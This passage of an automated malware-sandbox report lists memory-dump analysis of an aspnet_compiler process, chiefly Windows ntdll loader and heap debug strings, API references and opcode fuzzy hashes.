                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,7617ECF7,?,?,7617ECF7), ref: 0042C4D7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0

                                                      Control-flow Graph

                                                      control_flow_graph 156 1af2c0a-1af2c0f 157 1af2c1f-1af2c26 LdrInitializeThunk 156->157 158 1af2c11-1af2c18 156->158
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      Strings
                                                      • 8, xrefs: 01B252E3
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B254E2
                                                      • corrupted critical section, xrefs: 01B254C2
                                                      • undeleted critical section in freed memory, xrefs: 01B2542B
                                                      • Critical section debug info address, xrefs: 01B2541F, 01B2552E
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B2540A, 01B25496, 01B25519
                                                      • Invalid debug info address of this critical section, xrefs: 01B254B6
                                                      • double initialized or corrupted critical section, xrefs: 01B25508
                                                      • Thread identifier, xrefs: 01B2553A
                                                      • Critical section address., xrefs: 01B25502
                                                      • Critical section address, xrefs: 01B25425, 01B254BC, 01B25534
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01B25543
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B254CE
                                                      • Address of the debug info found in the active list., xrefs: 01B254AE, 01B254FA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      Strings
                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B22412
                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B22409
                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 01B2261F
                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B224C0
                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B22602
                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B222E4
                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B22624
                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B225EB
                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B22498
                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B22506
                                                      • @, xrefs: 01B2259B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                      • API String ID: 0-4009184096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                      • API String ID: 0-2515994595
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      • API String ID: 0-1700792311
                                                      Strings
                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B38A3D
                                                      • VerifierDebug, xrefs: 01B38CA5
                                                      • HandleTraces, xrefs: 01B38C8F
                                                      • VerifierFlags, xrefs: 01B38C50
                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B38A67
                                                      • AVRF: -*- final list of providers -*- , xrefs: 01B38B8F
                                                      • VerifierDlls, xrefs: 01B38CBD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                      • API String ID: 0-3223716464
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                      • API String ID: 0-1109411897
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • apphelp.dll, xrefs: 01AA6496
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B099ED
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B09A11, 01B09A3A
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B09A2A
                                                      • LdrpInitShimEngine, xrefs: 01B099F4, 01B09A07, 01B09A30
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B09A01
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • LdrpInitializeImportRedirection, xrefs: 01B28177, 01B281EB
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01AEC6C3
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 01B281E5
                                                      • LdrpInitializeProcess, xrefs: 01AEC6C4
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01B28181, 01B281F5
                                                      • Loading import redirection DLL: '%wZ', xrefs: 01B28170
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      Strings
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B22178
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B2219F
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B22180
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B221BF
                                                      • RtlGetAssemblyStorageRoot, xrefs: 01B22160, 01B2219A, 01B221BA
                                                      • SXS: %s() passed the empty activation context, xrefs: 01B22165
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      APIs
                                                        • Part of subcall function 01AF2DF0: LdrInitializeThunk.NTDLL ref: 01AF2DFA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0BA3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0BB6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0D60
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0D74
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                      • String ID:
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01AE8421
                                                      • @, xrefs: 01AE8591
                                                      • LdrpInitializeProcess, xrefs: 01AE8422
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AE855E
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B221D9, 01B222B1
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B222B6
                                                      • .Local, xrefs: 01AE28D8
                                                      • SXS: %s() passed the empty activation context, xrefs: 01B221DE
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      Strings
                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B23456
                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B23437
                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B2342A
                                                      • RtlDeactivateActivationContext, xrefs: 01B23425, 01B23432, 01B23451
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B11028
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B1106B
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B110AE
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B10FE5
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      Strings
                                                      • apphelp.dll, xrefs: 01AD2462
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B1A992
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B1A9A2
                                                      • LdrpDynamicShimModule, xrefs: 01B1A998
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01AC327D
                                                      • HEAP[%wZ]: , xrefs: 01AC3255
                                                      • HEAP: , xrefs: 01AC3264
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $@
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      Strings
                                                      • Failed to allocated memory for shimmed module list, xrefs: 01B1A10F
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B1A121
                                                      • LdrpCheckModule, xrefs: 01B1A117
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B282E8
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 01B282DE
                                                      • Failed to reallocate the system dirs string !, xrefs: 01B282D7
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • @, xrefs: 01B6C1F1
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B6C1C5
                                                      • PreferredUILanguages, xrefs: 01B6C212
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      Strings
                                                      • LdrpCheckRedirection, xrefs: 01B3488F
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B34888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01B34899
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-2558761708
                                                      Strings
                                                      • LdrpInitializationFailure, xrefs: 01B320FA
                                                      • Process initialization failed with status 0x%08lx, xrefs: 01B320F3
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B32104
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      Strings
                                                      • LdrResSearchResource Enter, xrefs: 01ABAA13
                                                      • LdrResSearchResource Exit, xrefs: 01ABAA25
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      • API String ID: 0-4066393604
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      Strings
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      • API String ID: 0-17815947
                                                      Strings
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01AB063D
                                                      • kLsE, xrefs: 01AB0540
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 01ABA309
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 01ABA2FB
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      Strings
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B3895E
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      • Opcode Fuzzy Hash: 4ed44213b4e9b34a5549cb22c70b4cf0a4c5620bc7501bab8bdc43de7b3a0eaa
                                                      • Instruction Fuzzy Hash: 0B710232200701AFEB3ADF18C984F6ABBA6EF41720F14859CE655972A0D774E944EB50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7462aa2d7f697e2aff33462977040424ac591118ed5a0d2cd630a8b967c8c20e
                                                      • Instruction ID: 7de62a90b9d3692672525bedfc86c274af338ec474154a8b4ab62f214053da97
                                                      • Opcode Fuzzy Hash: 7462aa2d7f697e2aff33462977040424ac591118ed5a0d2cd630a8b967c8c20e
                                                      • Instruction Fuzzy Hash: 4C819072A04345CFDB28CF9CD584BEDB7B9EB48310FAA41ADD9046B286D7759D40CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7ec6fd6c023581763888fece98c64d5301c1765c1b65bc9e86ff0aeb9fa58eb
                                                      • Instruction ID: 870caada9641c07e4b088f45495280ecc677036086cb07ac5f3d15639f0c61b3
                                                      • Opcode Fuzzy Hash: a7ec6fd6c023581763888fece98c64d5301c1765c1b65bc9e86ff0aeb9fa58eb
                                                      • Instruction Fuzzy Hash: 88710A71E0020AAFDF15DF94C981FEEBBB9FF04750F504269F621A6290D774AA05CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46d278a52730fc8e8d25c8ac72642653bc0628bfc48fe07ac16667f1b09c9761
                                                      • Instruction ID: 469fc695209ae467a5c52835a7c470c78ea8238d2bbf134fc5aea26f5fce78d7
                                                      • Opcode Fuzzy Hash: 46d278a52730fc8e8d25c8ac72642653bc0628bfc48fe07ac16667f1b09c9761
                                                      • Instruction Fuzzy Hash: 0651CF72504712AFDB15DA78C894B5BBBECEBD8750F0009A9BA40EB150D778ED05C7A2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44817ba1a4536406c4823e780f4ebd969573c113deec48f766bc99efe4b2b5b6
                                                      • Instruction ID: be8ef505c2c12eeb37cc065aa7997f0ef5136deb594a0d96ac7d8d27da2f3ec2
                                                      • Opcode Fuzzy Hash: 44817ba1a4536406c4823e780f4ebd969573c113deec48f766bc99efe4b2b5b6
                                                      • Instruction Fuzzy Hash: 8E51DE709007059FDB69CF5AC880B6BFBF8FF54710F10465EEA52576A1C7B0A545CB50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e864d3952e8d806791593e5274d3f281208a0d5a3524c4f3a800358a6e499eb2
                                                      • Instruction ID: 4d03e22b1ec1f3ab02054ac1fffdde8276d0ee361b1ba0bd4d8465f8b6bd8368
                                                      • Opcode Fuzzy Hash: e864d3952e8d806791593e5274d3f281208a0d5a3524c4f3a800358a6e499eb2
                                                      • Instruction Fuzzy Hash: E6519E31200A15EFCB22EFAACA84EAAB7F9FF14744F40046EE50597261D734E944CB60
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08fc8a4b25bf0f49e3a60fb0e16e107fef56b12d51f68ec53295bbfedd139179
                                                      • Instruction ID: 0717cb5031704b8139eb7b6c4a639871458ef1a5da40cfa0a4711c54ecd70a10
                                                      • Opcode Fuzzy Hash: 08fc8a4b25bf0f49e3a60fb0e16e107fef56b12d51f68ec53295bbfedd139179
                                                      • Instruction Fuzzy Hash: 045136716083029FD798DF29C980A6BBBE5FBC8204F44497DF999C7261E730D946CB52
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction ID: f50bb2a4b920a751153a068aa3d4e5b05a99b4a6734d9c195f551125c098c4e0
                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction Fuzzy Hash: EC51AF71E0061AABDF15DF98C540BEEBBB5EF49750F054069EA06EB640E734DE44CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction ID: b023c32aca32e355945f9daa4ad2834ccc908c4e7be664a8e7cc1af530cb649f
                                                      • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction Fuzzy Hash: AB51B971D0020AEFDF2A9B94C9C0BAEBB75EB80314F154696E611A7190E730DD558BA0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 401b7f0dd59e7d002a046d4bd017b76aee0ca21e6e72098847195ed9999484b4
                                                      • Instruction ID: a7f6b6fee4a04b99b29dadc8cfaaec1142a8f751672bcdb9faa7ac019007815e
                                                      • Opcode Fuzzy Hash: 401b7f0dd59e7d002a046d4bd017b76aee0ca21e6e72098847195ed9999484b4
                                                      • Instruction Fuzzy Hash: FB41F7707016019BEB2DDB2DC898F7BBB9AEF94220F088299E975C7390DB31D841C691
                                                      Memory Dump Source
